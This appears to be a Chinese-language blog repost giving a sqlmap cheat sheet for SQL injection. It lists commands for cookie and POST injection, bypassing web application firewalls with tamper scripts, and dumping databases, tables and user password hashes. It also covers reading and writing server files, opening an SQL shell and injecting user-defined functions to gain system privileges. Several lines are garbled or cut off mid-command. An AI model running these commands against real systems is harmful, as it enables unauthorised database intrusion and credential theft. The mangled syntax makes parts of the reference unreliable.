burpsuite安全与渗透之sqlm
以下比较详细对sqlmap介绍、我们用到部分、如果想对它深入了解、成为专家需要长期学习~~~~~
cookie注入:sqlmap.py-u注入点--cookie"参数"--tables--level2
POST登录框注入:sqlmap.py-r从文件读取数据-p指定的参数--tables
sqlmap.py-u登录的地址--forms自动判断注入
sqlmap.py-u登录的地址--data"指定参数"
绕过WAF防火墙:sqlmap.py-u注入点-v3--dbs--batch--tamperspace2morehash.py,space2hash.py,base64encode.py,charencode.py
-u#注入点
-g谷歌搜索
-f#指纹判别数据库类型
-b#获取数据库版本信息
-p#指定可测试的参数(?page=1id=2-p“page,id”)
-D“”#指定数据库名
-T“”#指定表名
-C“”#指定字段
-s“”#保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s“xx.log” 恢复:-s“xx.log”–resume)
–columns#列出字段
–current-user#获取当前用户名称
–current-db#获取当前数据库名称
–users#列数据库所有用户
–passwords#数据库用户所有密码
–privileges#查看用户权限(–privileges-Uroot)
-U#指定数据库用户
–dbs#列出所有数据库
–tables-D“”#列出指定数据库中的表
–columns-T“user”-D“mysql”#列出mysql数据库中的user表的所有字段
–dump-all#列出所有数据库所有表
–exclude-sysdbs#只列出用户自己新建的数据库和表
–dump-T“”-D“”-C“”#列出指定数据库的表的字段的数据(–dump-Tusers-Dmaster-Csurname)
–dump-T“”-D“”–start2–top4#列出指定数据库的表的2-4字段的数据
–dbms#指定数据库(MySQL,Oracle,PostgreSQL,MicrosoftSQLServer,MicrosoftAccess,SQLite,Firebird,Sybase,SAPMaxDB)
–os#指定系统(Linux,Windows)
--sql-shell写shell
--delay延迟的时间
--safe-freq次数
-v#详细的等级(0-6)
0:只显示Python的回溯,错误和关键消息。
1:显示信息和警告消息。
2:显示调试消息。
3:有效载荷注入。
4:显示HTTP请求。
5:显示HTTP响应头。
6:显示HTTP响应页面的内容
–privileges#查看权限
–is-dba#是否是数据库管理员
–roles#枚举数据库用户角色
–udf-inject#导入用户自定义函数(获取系统权限)
–union-check#是否支持union注入
–union-cols#union查询表记录
–union-test#union语句测试
–union-use#采用union注入
–union-techorderby#union配合orderby
–method“POST”–data“”#POST方式提交数据(–method“POST”–data“page=1id=2″)
–cookie“用;号分开”#cookie注入(–cookies=”PHPSESSID=mvijocbglq6pirlgk1e4v52;security=low”)
–referer“”#使用referer欺骗(–referer“ #采用多线程(–threads3)
–sql-shell#执行指定sql命令
–sql-query#执行指定的sql语句(–sql-query“SELECTpasswordFROMmysql.userWHEREuser=‘root’LIMIT0,1″)
–file-read#读取指定文件
–file-write#写入本地文件(–file-write/test/test.txt–file-dest/var/ 字段字典
转载请注明:http://www.sonphie.com/lcbx/14560.html